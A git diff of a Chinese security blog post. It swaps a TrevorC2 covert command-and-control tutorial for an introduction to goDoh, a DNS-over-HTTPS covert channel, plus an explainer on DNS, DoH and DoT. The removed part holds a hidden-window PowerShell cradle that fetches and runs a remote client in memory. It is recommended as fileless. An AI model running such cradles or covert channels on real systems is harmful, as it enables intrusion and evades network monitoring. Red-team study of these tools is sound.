--- a/_posts/2019-11-06-goDoh.markdown
+++ b/_posts/2019-11-06-goDoh.markdown
@@ -13,40 +13,16 @@ author: DshSec
 description: goDoh
 ---
 
-### Trevorc2
+## goDoh
 
-#### 0x00(介绍)：
-+ 项目地址：https://github.com/trustedsec/trevorc2  
-+ 项目介绍：TrevorC2是一种客户端/服务器模型，用于通过可浏览的网站隐藏命令和控制。由于时间的不同和不使用POST请求进行数据提取，使得检测变得更加困难。TrevorC2分为客户端和服务器。在此项目中，提供了三种形式的客户端，包括python、C#、powershell版本。trevorc2_client.py支持Windows，MacOS和Linux。您可以对Windows进行字节编译以获得可执行文件。如果是使用windows，也可以使用trevorc2_client.ps1利用powershell进行使用。  
+### 0x00(介绍):
++ 项目地址：https://github.com/sensepost/goDoH  
++ 项目博客：https://sensepost.com/blog/2018/waiting-for-godoh/  
++ 项目介绍：goDoh是一款通过DNS-Over-HTTPS进行DNS渗透的秘密通信工具  
 
+*TIPS*:
 
-#### 0x01(安装):
-安装时需要python环境，笔者测试过程中为python3环境  
-```
-git clone https://github.com/trustedsec/trevorc2.git
-cd trevorc2
-pip install -r requirements.txt
-```
->*TIPS:*
-在使用过程中服务器端无需太多的配置修改，建议修改CIPHER参数即可，该参数为链接秘钥，客户端和服务器端应当保持一致。
-![](imgclip.png "imgclip.png")  
-客户端中需要将配置文件中的$SITE_URL配置为自己服务器的站点。http://服务器IP
-
-
-#### 0x02(使用):
-服务端：
-```
-python trevorc2_server.py
-```
-
-客户端：
-1. 使用powershell:  
-```
-	powershell.exe -nop -w hidden -ep Bypass -c IEX(New-ObjectNet.WebClient).DownloadString("[trevorc2_client.ps1文件远程地址]");
-	powershell.exe -nop -w hidden -ep Bypass -c [trevorc2_client.ps1的本地路径]
-```
-建议使用第一种通过远程下载文件到内存中然后执行的方式进行，可以实现无文件。
-2. 使用python
-```
-	python trevorc2_client.py
-```
+>#### DNS
+DNS简单地来说作用就是将你所熟知的域名（baidu.com）转换为IP地址，因为在当前的网络环境这种无论是IPV6还是IPV4都是利用IP来进行数据的传递的，但是IP地址不容易记住，于是便有了DNS来进行域名转换成IP。但是DNS并不是加密的，到目前大家常用的DNS都是明文的，因此网络管理员或者其他能够截获到流量的人都能获取到您的DNS查询记录，从而知道你当前在和谁通信。由于DNS协议的设计缺陷，也无法保证完整性，导致可以进行DNS污染，DNS污染就是例如baidu.com正确的IP是IP1，但是由于无完整性校验，因此攻击者可以将其改为其他IP2，从而使你无法访问baidu.com或者被引导至其他网站。
+>#### DNS-over-HTTPS(Doh)和DNS-over-TLS(Dot)
+为了保证DNS查询的机密性和完整性， 便产生了两种保护DNS的方案，DNS-over-HTTPS和DNS-over-TLS。IETF将DNS over HTTPS定义为了RFC 8484，将DNS over TLS定义为了RFC 7858和RFC 8310。两者都通过TLS加密和身份验证，存在的主要区别就是使用了不一样基础连接协议，DNS over TLS使用了TCP作为基本的连接协议，而DNS over HTTPS则使用的是HTTPS和HTTP/2进行连接，两者采用的基本连接协议不一样也就导致了端口不一样。Dns-over-TLS存在专用端口853，DNS-over-HTTPS采用了HTTPS的端口443。因此采用DNS-over-HTTPS的DNS流量就可以完全隐藏在HTTPS流量中，网络管理员和审查机构也无法确定你是否进行了DNS查询。采用DNS-over-TLS的DNS查询会走端口853，虽然查询内容是加密的，但是出现853端口的流量，就能证明你进行了DNS查询，那么网络管理员和监管机构就可以对该端口的流量进行阻断。若需了解更多细节请查阅相关RFC文档。
